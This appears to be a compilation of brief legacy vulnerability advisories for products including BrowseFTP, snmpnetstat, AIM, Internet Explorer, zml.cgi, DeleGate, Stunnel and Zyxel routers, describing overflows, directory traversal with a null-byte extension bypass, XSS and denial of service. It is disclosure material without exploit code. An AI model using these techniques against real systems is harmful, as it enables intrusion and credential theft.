BrowseFTP is an ftp client that runs on various Microsoft Windows operating systems. An issue has been reported which could allow for a malicious ftp server to execute arbitrary code on a BrowseFTP client user. This is acheivable when a BrowseFTP user connects to an ftp host, if the FTP server '220' response is of excessive length. The stack-based overflow condition can allow for malicious administrators to execute arbitrary code on (and gain control of) client hosts. It is also possible to crash the client.
A heap overflow vulnerability exists in the snmpnetstat client. A SNMP host may return malicious information when a list of interfaces is requested. Under some circumstances, this will result in a heap overflow in the SNMP client. Exploitation of this vulnerability can result in the execution of abritary code as the snmpnetstat client.
BSCW (Basic Support for Cooperative Work) is a web-based groupware application, allowing users to share a workspace via a web interface. It runs on Microsoft Windows NT/2000 systems, as well as a number of Unix variants. The default installation allows users to self-register, potentially allowing untrusted users to access the service. This may provide a window of opportunity for an untrusted, malicious user to access the service to exploit known issues. One example of an existing issue that may be exploited as a result of untrusted users being able to self-register is BugTraq ID 3776 'BSCW Remote Command Execution Vulnerability'.
A vulnerability exists in the way that AIM parses a game request with a TLV (type, length, value) type of 0x2711. This type of game request is prone to a buffer overflow which could allow a remote user to obtain the same privileges of the user who is currently logged on.
A vulnerability exists in Microsoft Internet Explorer that may allow a remote attacker to view known files on a target system when a user views web content containing a specially crafted script. The problem occurs when the 'GetObject()' JScript function is used with the ActiveX object 'htmlfile.' If a URL containing "../" sequences is passed as the first argument to the function, it is possible to cause Internet Explorer to grant full access to the DOM of the created HTML document object.
zml.cgi is a perl script which can be used to support server side include directives under Apache. It accepts as a parameter the file to parse for these ssi directives. This parameter is susceptible to the standard ../ directory traversal attack, allowing arbitrary files to be specified. Although the script attempts to append a .zml extension to any file accessed, appending a null byte to the file name parameter is sufficient to evade this restriction.
DeleGate is prone to cross-site scripting attacks. HTML tags are not filtered from links to error pages. As a result, it is possible for an attacker to insert malicious script code into a link to a site running DeleGate. When a web user clicks the link an error page will be displayed and the script code will be executed on the web user in the context of the site running DeleGate. Such an attack may be used to steal a legitimate user's cookie-based authentication credentials.
When a protocol is initiated between a client and the server, it is possible to supply a format string to the Stunnel server that may result in the execution of arbitrary code.
Aktivate is prone to cross-site scripting attacks. It is possible to construct a link containing arbitrary script code to a website running Aktivate. When a user browses the link, the script code will be executed on the user in the context of the site hosting the affected software. The impact of this issue is that the attacker is able to hijack a legitimate web user's session, by stealing cookie-based authentication credentials. Other cross-site scripting attacks are also possible.
Prestige is a product line of DSL routers produced and distributed by Zyxel. When a Zyxel router receives fragmented packets that after reassembly is greater than 64 kilobytes in length, the router crashes. The router must be power cycled to resume normal operation. This could lead to a remote user denying service to a legitimate user of the router. The router is affected only by fragmented packets received through the DSL interface. Fragmented packets sent through the LAN interface have no affect on the system.
Services By CQR